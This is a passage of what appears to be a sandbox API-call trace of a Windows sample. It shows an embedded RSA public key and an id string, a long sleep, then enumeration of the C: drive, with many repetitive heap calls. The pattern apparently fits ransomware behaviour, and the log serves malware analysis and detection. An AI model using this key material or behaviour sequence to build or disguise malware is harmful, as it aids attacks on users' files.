KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAuS\\/uEwpTF9K5knH4GbCD\\\\nNaStMcirWtNLwc1IbSIfYXbwfli6D44yIspAZMar+wotlh6KKYWNifwh8kHWr84b\\\\nOfqYirep9DvZMmAwGFTmgG2GwOV8hFJSpXGzlzY15D4jRTtuxZBiox7p+8nNHShm\\\\n1w1Mx1fsqICoKte18dzQ3C714H\\/WmGGmwVNp\\/56V2CYVFMB4JsRnUzxYEBLWly6Q\\\\n65F4PyfqcY3af5ibMbUVeE6AOTnpoqo12nXcY\\/X9zd07tctrIXIm+2ABmtxWckAz\\\\nkKDXfdWboqP\\/isn1NFKVmh7NfyWvZhb7+w28\\/xr+G1udzTk6xWXT2lrbwLp7MxyK\\\\nqwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 495 [0123.470] lstrlenA (lpString="\",\"id\":\"") returned 8 [0123.470] lstrcpyA (in: lpString1=0xfc0ab78, lpString2="9UR8CEfVlhGJx3jwwXdVqZ3owpwVZwN7BjVbRUSR\"}" | out: lpString1="9UR8CEfVlhGJx3jwwXdVqZ3owpwVZwN7BjVbRUSR\"}") returned="9UR8CEfVlhGJx3jwwXdVqZ3owpwVZwN7BjVbRUSR\"}" [0123.470] lstrcpyA (in: lpString1=0xfc0a778, lpString2="9UR8CEfVlhGJx3jwwXdVqZ3owpwVZwN7BjVbRUSR\"}" | out: lpString1="9UR8CEfVlhGJx3jwwXdVqZ3owpwVZwN7BjVbRUSR\"}") returned="9UR8CEfVlhGJx3jwwXdVqZ3owpwVZwN7BjVbRUSR\"}" [0123.470] lstrlenA (lpString="9UR8CEfVlhGJx3jwwXdVqZ3owpwVZwN7BjVbRUSR\"}") returned 42 [0123.470] lstrlenA (lpString="9UR8CEfVlhGJx3jwwXdVqZ3owpwVZwN7BjVbRUSR\"}") returned 42 [0123.470] lstrlenA (lpString="9UR8CEfVlhGJx3jwwXdVqZ3owpwVZwN7BjVbRUSR\"}") returned 42 [0123.470] lstrlenA (lpString="9UR8CEfVlhGJx3jwwXdVqZ3owpwVZwN7BjVbRUSR\"}") returned 42 [0123.470] lstrlenA (lpString="9UR8CEfVlhGJx3jwwXdVqZ3owpwVZwN7BjVbRUSR\"}") returned 42 [0123.470] lstrlenA (lpString="9UR8CEfVlhGJx3jwwXdVqZ3owpwVZwN7BjVbRUSR\"}") returned 42 [0123.470] lstrlenA (lpString="9UR8CEfVlhGJx3jwwXdVqZ3owpwVZwN7BjVbRUSR\"}") returned 42 [0123.471] lstrlenA (lpString="9UR8CEfVlhGJx3jwwXdVqZ3owpwVZwN7BjVbRUSR\"}") returned 42 [0123.471] lstrlenA (lpString="9UR8CEfVlhGJx3jwwXdVqZ3owpwVZwN7BjVbRUSR\"}") returned 42 [0123.471] lstrlenA (lpString="9UR8CEfVlhGJx3jwwXdVqZ3owpwVZwN7BjVbRUSR\"}") returned 42 [0123.471] lstrlenA (lpString="9UR8CEfVlhGJx3jwwXdVqZ3owpwVZwN7BjVbRUSR\"}") returned 42 [0123.471] lstrlenA (lpString="9UR8CEfVlhGJx3jwwXdVqZ3owpwVZwN7BjVbRUSR\"}") returned 42 [0123.471] lstrlenA (lpString="9UR8CEfVlhGJx3jwwXdVqZ3owpwVZwN7BjVbRUSR\"}") returned 42 [0123.471] lstrlenA (lpString="9UR8CEfVlhGJx3jwwXdVqZ3owpwVZwN7BjVbRUSR\"}") returned 42 [0123.471] lstrlenA (lpString="9UR8CEfVlhGJx3jwwXdVqZ3owpwVZwN7BjVbRUSR\"}") returned 42 [0123.471] lstrlenA (lpString="9UR8CEfVlhGJx3jwwXdVqZ3owpwVZwN7BjVbRUSR\"}") returned 42 [0123.471] lstrlenA (lpString="9UR8CEfVlhGJx3jwwXdVqZ3owpwVZwN7BjVbRUSR\"}") returned 42 [0123.471] lstrlenA (lpString="9UR8CEfVlhGJx3jwwXdVqZ3owpwVZwN7BjVbRUSR\"}") returned 42 [0123.471] lstrlenA (lpString="9UR8CEfVlhGJx3jwwXdVqZ3owpwVZwN7BjVbRUSR\"}") returned 42 [0123.471] lstrlenA (lpString="9UR8CEfVlhGJx3jwwXdVqZ3owpwVZwN7BjVbRUSR\"}") returned 42 [0123.471] lstrlenA (lpString="9UR8CEfVlhGJx3jwwXdVqZ3owpwVZwN7BjVbRUSR\"}") returned 42 [0123.471] lstrlenA (lpString="9UR8CEfVlhGJx3jwwXdVqZ3owpwVZwN7BjVbRUSR\"}") returned 42 [0123.471] lstrlenA (lpString="9UR8CEfVlhGJx3jwwXdVqZ3owpwVZwN7BjVbRUSR\"}") returned 42 [0123.471] lstrlenA (lpString="9UR8CEfVlhGJx3jwwXdVqZ3owpwVZwN7BjVbRUSR\"}") returned 42 [0123.471] lstrlenA (lpString="9UR8CEfVlhGJx3jwwXdVqZ3owpwVZwN7BjVbRUSR\"}") returned 42 [0123.471] lstrlenA (lpString="9UR8CEfVlhGJx3jwwXdVqZ3owpwVZwN7BjVbRUSR\"}") returned 42 [0123.471] lstrlenA (lpString="9UR8CEfVlhGJx3jwwXdVqZ3owpwVZwN7BjVbRUSR\"}") returned 42 [0123.471] lstrlenA (lpString="9UR8CEfVlhGJx3jwwXdVqZ3owpwVZwN7BjVbRUSR\"}") returned 42 [0123.471] lstrlenA (lpString="9UR8CEfVlhGJx3jwwXdVqZ3owpwVZwN7BjVbRUSR\"}") returned 42 [0123.471] lstrlenA (lpString="9UR8CEfVlhGJx3jwwXdVqZ3owpwVZwN7BjVbRUSR\"}") returned 42 [0123.471] lstrlenA (lpString="9UR8CEfVlhGJx3jwwXdVqZ3owpwVZwN7BjVbRUSR\"}") returned 42 [0123.471] lstrlenA (lpString="9UR8CEfVlhGJx3jwwXdVqZ3owpwVZwN7BjVbRUSR\"}") returned 42 [0123.471] lstrlenA (lpString="9UR8CEfVlhGJx3jwwXdVqZ3owpwVZwN7BjVbRUSR\"}") returned 42 [0123.471] lstrlenA (lpString="9UR8CEfVlhGJx3jwwXdVqZ3owpwVZwN7BjVbRUSR\"}") returned 42 [0123.471] lstrlenA (lpString="9UR8CEfVlhGJx3jwwXdVqZ3owpwVZwN7BjVbRUSR\"}") returned 42 [0123.472] lstrlenA (lpString="9UR8CEfVlhGJx3jwwXdVqZ3owpwVZwN7BjVbRUSR\"}") returned 42 [0123.472] lstrlenA (lpString="9UR8CEfVlhGJx3jwwXdVqZ3owpwVZwN7BjVbRUSR\"}") returned 42 [0123.472] lstrlenA (lpString="9UR8CEfVlhGJx3jwwXdVqZ3owpwVZwN7BjVbRUSR\"}") returned 42 [0123.472] lstrlenA (lpString="9UR8CEfVlhGJx3jwwXdVqZ3owpwVZwN7BjVbRUSR\"}") returned 42 [0123.472] lstrlenA (lpString="9UR8CEfVlhGJx3jwwXdVqZ3owpwVZwN7BjVbRUSR\"}") returned 42 [0123.472] lstrlenA (lpString="9UR8CEfVlhGJx3jwwXdVqZ3owpwVZwN7BjVbRUSR\"}") returned 42 [0123.472] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x320fab0 [0123.472] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x854) returned 0x321f5e0 [0123.472] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x320fab0, cbMultiByte=-1, lpWideCharStr=0x321f5e0, cchWideChar=1066 | out: lpWideCharStr="9UR8CEfVlhGJx3jwwXdVqZ3owpwVZwN7BjVbRUSR\"}") returned 43 [0123.472] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x860) returned 0x3219368 [0123.472] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x321f5e0 | out: hHeap=0x620000) returned 1 [0123.472] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x320fab0 | out: hHeap=0x620000) returned 1 [0123.472] lstrcpyW (in: lpString1=0x521cf0, lpString2="9UR8CEfVlhGJx3jwwXdVqZ3owpwVZwN7BjVbRUSR\"}" | out: lpString1="9UR8CEfVlhGJx3jwwXdVqZ3owpwVZwN7BjVbRUSR\"}") returned="9UR8CEfVlhGJx3jwwXdVqZ3owpwVZwN7BjVbRUSR\"}" [0123.472] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3219368 | out: hHeap=0x620000) returned 1 [0123.472] lstrlenA (lpString="9UR8CEfVlhGJx3jwwXdVqZ3owpwVZwN7BjVbRUSR\"}") returned 42 [0123.472] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x56) returned 0x32390b0 [0123.472] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0xfc0a778, cbMultiByte=-1, lpWideCharStr=0x32390b0, cchWideChar=43 | out: lpWideCharStr="9UR8CEfVlhGJx3jwwXdVqZ3owpwVZwN7BjVbRUSR\"}") returned 43 [0123.472] lstrcpyW (in: lpString1=0x521cf0, lpString2="9UR8CEfVlhGJx3jwwXdVqZ3owpwVZwN7BjVbRUSR\"}" | out: lpString1="9UR8CEfVlhGJx3jwwXdVqZ3owpwVZwN7BjVbRUSR\"}") returned="9UR8CEfVlhGJx3jwwXdVqZ3owpwVZwN7BjVbRUSR\"}" [0123.472] lstrlenW (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAuS\\/uEwpTF9K5knH4GbCD\\\\nNaStMcirWtNLwc1IbSIfYXbwfli6D44yIspAZMar+wotlh6KKYWNifwh8kHWr84b\\\\nOfqYirep9DvZMmAwGFTmgG2GwOV8hFJSpXGzlzY15D4jRTtuxZBiox7p+8nNHShm\\\\n1w1Mx1fsqICoKte18dzQ3C714H\\/WmGGmwVNp\\/56V2CYVFMB4JsRnUzxYEBLWly6Q\\\\n65F4PyfqcY3af5ibMbUVeE6AOTnpoqo12nXcY\\/X9zd07tctrIXIm+2ABmtxWckAz\\\\nkKDXfdWboqP\\/isn1NFKVmh7NfyWvZhb7+w28\\/xr+G1udzTk6xWXT2lrbwLp7MxyK\\\\nqwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 495 [0123.472] lstrlenW (lpString="9UR8CEfVlhGJx3jwwXdVqZ3owpwVZwN7BjVbRUSR") returned 40 [0123.551] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x321f218 | out: hHeap=0x620000) returned 1 Thread: id = 86 os_tid = 0x360 [0126.083] timeGetTime () returned 0x11545a8 [0126.083] GetLastError () returned 0x54f [0126.083] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x8, Size=0x3bc) returned 0x3291930 [0126.083] GetCurrentThreadId () returned 0x360 [0126.083] SetLastError (dwErrCode=0x54f) [0126.083] Sleep (dwMilliseconds=0x182b8) [0141.605] Sleep (dwMilliseconds=0x3e8) [0142.619] GetLogicalDrives () returned 0x4 [0142.619] SetErrorMode (uMode=0x1) returned 0x0 [0142.619] PathFileExistsA (pszPath="C:\\") returned 1 [0142.620] SetErrorMode (uMode=0x0) returned 0x1 [0142.620] GetDriveTypeA (lpRootPathName="C:\\") returned 0x3 [0142.620] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x806) returned 0x3290eb8 [0142.620] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x9dbfe60, cbMultiByte=-1, lpWideCharStr=0x3290eb8, cchWideChar=1027 | out: lpWideCharStr="C:\\") returned 4 [0142.620] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x810) returned 0x9aaf2b8 [0142.620] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3290eb8 | out: hHeap=0x620000) returned 1 [0142.620] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x18) returned 0x323e090 [0142.620] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aaf2b8 | out: hHeap=0x620000) returned 1 [0142.620] PeekMessageW (in: lpMsg=0x9dbfb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9dbfb74) returned 0 [0142.621] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x9aaf2b8 [0142.621] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aaf2b8 | out: hHeap=0x620000) returned 1 [0142.621] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x9aaf2b8 [0142.621] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aaf2b8 | out: hHeap=0x620000) returned 1 [0142.621] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x9aaf2b8 [0142.621] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aaf2b8 | out: hHeap=0x620000) returned 1 [0142.621] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x9aaf2b8 [0142.621] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aaf2b8 | out: hHeap=0x620000) returned 1 [0142.621] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x9aaf2b8 [0142.621] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aaf2b8 | out: hHeap=0x620000) returned 1 [0142.621] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x9aaf2b8 [0142.621] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aaf2b8 | out: hHeap=0x620000) returned 1 [0142.621] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x9aaf2b8 [0142.621] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc2e) returned 0x325d510 [0142.622] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aaf2b8 | out: hHeap=0x620000) returned 1 [0142.622] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x325d510 | out: hHeap=0x620000) returned 1 [0142.622] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x9aaf2b8 [0142.622] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aaf2b8 | out: hHeap=0x620000) returned 1 [0142.622] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x9aaf2b8 [0142.622] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aaf2b8 | out: hHeap=0x620000) returned 1 [0142.622] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x860) returned 0x3290eb8 [0142.622] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3290eb8 | out: hHeap=0x620000) returned 1 [0142.622] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x860) returned 0x3290eb8 [0142.622] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3290eb8 | out: hHeap=0x620000) returned 1 [0142.622] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x9aaf2b8 [0142.622] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aaf2b8 | out: hHeap=0x620000) returned 1 [0142.622] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x9aaf2b8 [0142.622] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aaf2b8 | out: hHeap=0x620000) returned 1 [0142.622] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x9aaf2b8 [0142.622] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aaf2b8 | out: hHeap=0x620000) returned 1 [0142.622] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x9aaf2b8 [0142.622] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aaf2b8 | out: hHeap=0x620000) returned 1 [0142.622] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x9aaf2b8 [0142.622] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aaf2b8 | out: hHeap=0x620000) returned 1 [0142.622] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x9aaf2b8 [0142.622] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aaf2b8 | out: hHeap=0x620000) returned 1 [0142.622] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x9aaf2b8 [0142.623] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aaf2b8 | out: hHeap=0x620000) returned 1 [0142.623] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x9aaf2b8 [0142.623] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aaf2b8 | out: hHeap=0x620000) returned 1 [0142.623] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x9aaf2b8 [0142.623] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aaf2b8 | out: hHeap=0x620000) returned 1 [0142.623] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x9aaf2b8 [0142.623] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aaf2b8 | out: hHeap=0x620000) returned 1 [0142.623] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x9aaf2b8 [0142.623] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aaf2b8 | out: hHeap=0x620000) returned 1 [0142.623] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x9aaf2b8 [0142.623] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc46) returned 0x325d510 [0142.623] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aaf2b8 | out: hHeap=0x620000) returned 1 [0142.623] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x325d510 | out: hHeap=0x620000) returned 1 [0142.623] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x9aaf2b8 [0142.623] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aaf2b8 | out: hHeap=0x620000) returned 1 [0142.623] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x9aaf2b8 [0142.623] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc2e) returned 0x325d510 [0142.623] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aaf2b8 | out: hHeap=0x620000) returned 1 [0142.623] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x325d510 | out: hHeap=0x620000) returned 1 [0142.623] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x860) returned 0x3290eb8 [0142.623] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3290eb8 | out: hHeap=0x620000) returned 1 [0142.623] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x860) returned 0x3290eb8 [0142.623] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3290eb8 | out: hHeap=0x620000) returned 1 [0142.623] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x9aaf2b8 [0142.623] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aaf2b8 | out: hHeap=0x620000) returned 1 [0142.623] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x9aaf2b8 [0142.623] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aaf2b8 | out: hHeap=0x620000) returned 1 [0142.624] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x9aaf2b8 [0142.624] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc46) returned 0x325d510 [0142.624] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aaf2b8 | out: hHeap=0x620000) returned 1 [0142.624] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x325d510 | out: hHeap=0x620000) returned 1 [0142.624] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x9aaf2b8 [0142.624] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aaf2b8 | out: hHeap=0x620000) returned 1 [0142.624] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x9aaf2b8 [0142.624] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aaf2b8 | out: hHeap=0x620000) returned 1 [0142.624] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x9aaf2b8 [0142.624] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aaf2b8 | out: hHeap=0x620000) returned 1 [0142.624] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x9aaf2b8 [0142.624] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aaf2b8 | out: hHeap=0x620000) returned 1 [0142.624] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x9aaf2b8 [0142.624] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aaf2b8 | out: hHeap=0x620000) returned 1 [0142.624] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x9aaf2b8 [0142.624] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aaf2b8 | out: hHeap=0x620000) returned 1 [0142.624] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x9aaf2b8 [0142.624] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aaf2b8 | out: hHeap=0x620000) returned 1 [0142.624] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x9aaf2b8 [0142.624] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aaf2b8 | out: hHeap=0x620000) returned 1 [0142.624] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x9aaf2b8 [0142.624] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aaf2b8 | out: hHeap=0x620000) returned 1 [0142.624] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x9aaf2b8 [0142.624] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc46) returned 0x325d510 [0142.624] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aaf2b8 | out: hHeap=0x620000) returned 1 [0142.624] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x325d510 | out: hHeap=0x620000) returned 1 [0142.624] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x9aaf2b8 [0142.624] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aaf2b8 | out: hHeap=0x620000) returned 1 [0142.624] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x860) returned 0x3290eb8 [0142.625] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3290eb8 | out: hHeap=0x620000) returned 1 [0142.625] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x860) returned 0x3290eb8 [0142.625] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3290eb8 | out: hHeap=0x620000) returned 1 [0142.625] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x9aaf2b8 [0142.625] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aaf2b8 | out: hHeap=0x620000) returned 1 [0142.625] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x9aaf2b8 [0142.625] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aaf2b8 | out: hHeap=0x620000) returned 1 [0142.625] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x9aaf2b8 [0142.625] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc46) returned 0x325d510 [0142.625] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aaf2b8 | out: hHeap=0x620000) returned 1 [0142.625] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x325d510 | out: hHeap=0x620000) returned 1 [0142.625] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x9aaf2b8 [0142.625] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aaf2b8 | out: hHeap=0x620000) returned 1 [0142.625] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x9aaf2b8 [0142.625] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aaf2b8 | out: hHeap=0x620000) returned 1 [0142.625] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x9aaf2b8 [0142.625] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aaf2b8 | out: hHeap=0x620000) returned 1 [0142.625] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x9aaf2b8 [0142.625] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aaf2b8 | out: hHeap=0x620000) returned 1 [0142.625] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x9aaf2b8 [0142.625] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aaf2b8 | out: hHeap=0x620000) returned 1 [0142.625] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x9aaf2b8 [0142.625] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aaf2b8 | out: hHeap=0x620000) returned 1 [0142.625] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x9aaf2b8 [0142.625] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aaf2b8 | out: hHeap=0x620000) returned 1 [0142.625] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x9aaf2b8 [0142.625] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aaf2b8 | out: hHeap=0x620000) returned 1 [0142.625] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x9aaf2b8 [0142.625] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aaf2b8 | out: hHeap=0x620000) returned 1 [0142.625] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x9aaf2b8 [0142.625] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc46) returned 0x325d510 [0142.626] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aaf2b8 | out: hHeap=0x620000) returned 1 [0142.626] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x325d510 | out: hHeap=0x620000) returned 1 [0142.626] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x9aaf2b8 [0142.626] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aaf2b8 | out: hHeap=0x620000) returned 1 [0142.626] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x860) returned 0x3290eb8 [0142.626] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3290eb8 | out: hHeap=0x620000) returned 1 [0142.626] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x860) returned 0x3290eb8 [0142.626] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3290eb8 | out: hHeap=0x620000) returned 1 [0142.626] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x9aaf2b8 [0142.626] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aaf2b8 | out: hHeap=0x620000) returned 1 [0142.626] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x9aaf2b8 [0142.626] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aaf2b8 | out: hHeap=0x620000) returned 1 [0142.626] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x9aaf2b8 [0142.626] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc46) returned 0x325d510 [0142.626] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aaf2b8 | out: hHeap=0x620000) returned 1 [0142.626] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x325d510 | out: hHeap=0x620000) returned 1 [0142.626] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x9aaf2b8 [0142.626] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aaf2b8 | out: hHeap=0x620000) returned 1 [0142.626] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x9aaf2b8 [0142.626] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aaf2b8 | out: hHeap=0x620000) returned 1 